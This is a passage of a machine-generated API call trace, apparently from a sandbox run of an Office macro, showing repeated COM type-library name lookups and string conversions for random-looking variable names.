This=0x665bd20, szNameBuf="_B_var_d4BUQ4", lHashVal=0x10df21, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.885] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.885] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.885] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_d4BUQ4", lHashVal=0x10df21, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.885] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.885] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.885] IUnknown:Release (This=0x665ba50) returned 0xd [0068.885] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc2e6a, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_d4BUQ4") returned 14 [0068.885] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_d4BUQ4", lHashVal=0x10df21, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x64005f00720061, ppTypeComp=0x51005500000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x64005f00720061, ppTypeComp=0x51005500000000, pDummy=0x0) returned 0x0 [0068.885] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a6143a | out: _Dst=0x144ec0) returned 0x0 [0068.885] ITypeComp:RemoteBind (in: This=0x665ba60, szName="YUAC1AB", lHashVal=0x105b84, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.885] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61412, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="YUAC1AB") returned 8 [0068.886] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="YUAC1AB", lHashVal=0x105b84, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.886] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61412, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="YUAC1AB") returned 8 [0068.886] ITypeComp:RemoteBind (in: This=0x665bd30, szName="YUAC1AB", lHashVal=0x105b84, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.886] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="YUAC1AB") returned 0x105b84 [0068.886] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="YUAC1AB" | out: _Dst="YUAC1AB") returned 0x0 [0068.886] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="YUAC1AB") returned 8 [0068.886] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.886] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="YUAC1AB", lHashVal=0x105b84, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.886] IUnknown:Release (This=0x665ba50) returned 0xd [0068.886] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.886] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="YUAC1AB", lHashVal=0x105b84, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.886] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.886] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.886] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="YUAC1AB", lHashVal=0x105b84, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.886] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.886] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.886] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="YUAC1AB", lHashVal=0x105b84, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.886] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.886] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61412, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="YUAC1AB") returned 8 [0068.886] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="YUAC1AB", lHashVal=0x105b84, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.886] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0068.886] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a61412 | out: _Dst=0x67c2d40) returned 0x0 [0068.886] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_YUAC1AB") returned 0x105f08 [0068.886] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_YUAC1AB" | out: _Dst="_B_var_YUAC1AB") returned 0x0 [0068.886] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_YUAC1AB") returned 15 [0068.886] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.886] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_YUAC1AB", lHashVal=0x105f08, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.886] IUnknown:Release (This=0x665ba50) returned 0xd [0068.886] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.886] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_YUAC1AB", lHashVal=0x105f08, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.886] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.886] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.886] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_YUAC1AB", lHashVal=0x105f08, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.886] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.886] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.887] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_YUAC1AB", lHashVal=0x105f08, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.887] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.887] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.887] IUnknown:Release (This=0x665ba50) returned 0xd [0068.887] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc2e9a, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_YUAC1AB") returned 15 [0068.887] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_YUAC1AB", lHashVal=0x105f08, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x59005f00720061, ppTypeComp=0x31004300000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x59005f00720061, ppTypeComp=0x31004300000000, pDummy=0x0) returned 0x0 [0068.887] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a61412 | out: _Dst=0x144ec0) returned 0x0 [0068.887] ITypeComp:RemoteBind (in: This=0x665ba60, szName="F4AkUDB", lHashVal=0x10c774, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.887] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6148a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="F4AkUDB") returned 8 [0068.887] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="F4AkUDB", lHashVal=0x10c774, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.887] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6148a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="F4AkUDB") returned 8 [0068.887] ITypeComp:RemoteBind (in: This=0x665bd30, szName="F4AkUDB", lHashVal=0x10c774, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.887] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="F4AkUDB") returned 0x10c774 [0068.887] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="F4AkUDB" | out: _Dst="F4AkUDB") returned 0x0 [0068.887] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="F4AkUDB") returned 8 [0068.887] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.887] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="F4AkUDB", lHashVal=0x10c774, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.887] IUnknown:Release (This=0x665ba50) returned 0xd [0068.887] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.887] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="F4AkUDB", lHashVal=0x10c774, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.887] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.887] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.887] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="F4AkUDB", lHashVal=0x10c774, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.887] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.887] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.888] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="F4AkUDB", lHashVal=0x10c774, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.888] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.888] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6148a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="F4AkUDB") returned 8 [0068.888] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="F4AkUDB", lHashVal=0x10c774, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.888] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0068.888] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a6148a | out: _Dst=0x67c2d40) returned 0x0 [0068.888] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_F4AkUDB") returned 0x10caf8 [0068.888] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="X_ZAXZ", cchCount1=-1, lpString2="_B_var_F4AkUDB", cchCount2=-1) returned 3 [0068.888] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_F4AkUDB" | out: _Dst="_B_var_F4AkUDB") returned 0x0 [0068.888] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_F4AkUDB") returned 15 [0068.888] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.888] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_F4AkUDB", lHashVal=0x10caf8, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.888] IUnknown:Release (This=0x665ba50) returned 0xd [0068.888] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.888] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_F4AkUDB", lHashVal=0x10caf8, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.888] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.888] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.888] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_F4AkUDB", lHashVal=0x10caf8, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.888] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.888] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.888] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_F4AkUDB", lHashVal=0x10caf8, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.888] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.888] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.888] IUnknown:Release (This=0x665ba50) returned 0xd [0068.888] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc2eca, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_F4AkUDB") returned 15 [0068.888] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_F4AkUDB", lHashVal=0x10caf8, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x46005f00720061, ppTypeComp=0x55006b00000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x46005f00720061, ppTypeComp=0x55006b00000000, pDummy=0x0) returned 0x0 [0068.888] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a6148a | out: _Dst=0x144ec0) returned 0x0 [0068.889] ITypeComp:RemoteBind (in: This=0x665ba60, szName="twQQwZA4", lHashVal=0x10ccb4, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.889] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a614b2, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="twQQwZA4") returned 9 [0068.889] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="twQQwZA4", lHashVal=0x10ccb4, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.889] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a614b2, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="twQQwZA4") returned 9 [0068.889] ITypeComp:RemoteBind (in: This=0x665bd30, szName="twQQwZA4", lHashVal=0x10ccb4, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.889] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="twQQwZA4") returned 0x10ccb4 [0068.889] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="twQQwZA4" | out: _Dst="twQQwZA4") returned 0x0 [0068.889] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="twQQwZA4") returned 9 [0068.889] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.889] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="twQQwZA4", lHashVal=0x10ccb4, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.889] IUnknown:Release (This=0x665ba50) returned 0xd [0068.889] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.889] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="twQQwZA4", lHashVal=0x10ccb4, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.889] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.889] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.889] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="twQQwZA4", lHashVal=0x10ccb4, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.889] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.889] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.889] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="twQQwZA4", lHashVal=0x10ccb4, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.889] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.889] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a614b2, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="twQQwZA4") returned 9 [0068.889] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="twQQwZA4", lHashVal=0x10ccb4, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.890] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0068.890] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3a614b2 | out: _Dst=0x67c2d40) returned 0x0 [0068.890] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_twQQwZA4") returned 0x10a43d [0068.890] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_twQQwZA4" | out: _Dst="_B_var_twQQwZA4") returned 0x0 [0068.890] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_twQQwZA4") returned 16 [0068.890] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.890] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_twQQwZA4", lHashVal=0x10a43d, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.890] IUnknown:Release (This=0x665ba50) returned 0xd [0068.890] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.890] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_twQQwZA4", lHashVal=0x10a43d, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.890] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.890] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.890] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_twQQwZA4", lHashVal=0x10a43d, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.890] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.890] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.890] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_twQQwZA4", lHashVal=0x10a43d, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.890] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.890] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.890] IUnknown:Release (This=0x665ba50) returned 0xd [0068.890] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc2efa, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_twQQwZA4") returned 16 [0068.890] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_twQQwZA4", lHashVal=0x10a43d, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x74005f00720061, ppTypeComp=0x77005100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x74005f00720061, ppTypeComp=0x77005100000000, pDummy=0x0) returned 0x0 [0068.890] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3a614b2 | out: _Dst=0x144ec0) returned 0x0 [0068.890] ITypeComp:RemoteBind (in: This=0x665ba60, szName="jAZA1XoD", lHashVal=0x10d4ac, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.890] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a614de, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="jAZA1XoD") returned 9 [0068.890] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="jAZA1XoD", lHashVal=0x10d4ac, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.891] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a614de, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="jAZA1XoD") returned 9 [0068.891] ITypeComp:RemoteBind (in: This=0x665bd30, szName="jAZA1XoD", lHashVal=0x10d4ac, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.891] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="jAZA1XoD") returned 0x10d4ac [0068.891] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="jAZA1XoD" | out: _Dst="jAZA1XoD") returned 0x0 [0068.891] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="jAZA1XoD") returned 9 [0068.891] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.891] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="jAZA1XoD", lHashVal=0x10d4ac, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.891] IUnknown:Release (This=0x665ba50) returned 0xd [0068.891] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.891] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="jAZA1XoD", lHashVal=0x10d4ac, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.891] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.891] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.891] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="jAZA1XoD", lHashVal=0x10d4ac, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.891] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.891] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.891] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="jAZA1XoD", lHashVal=0x10d4ac, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.891] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.891] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a614de, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="jAZA1XoD") returned 9 [0068.891] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="jAZA1XoD", lHashVal=0x10d4ac, 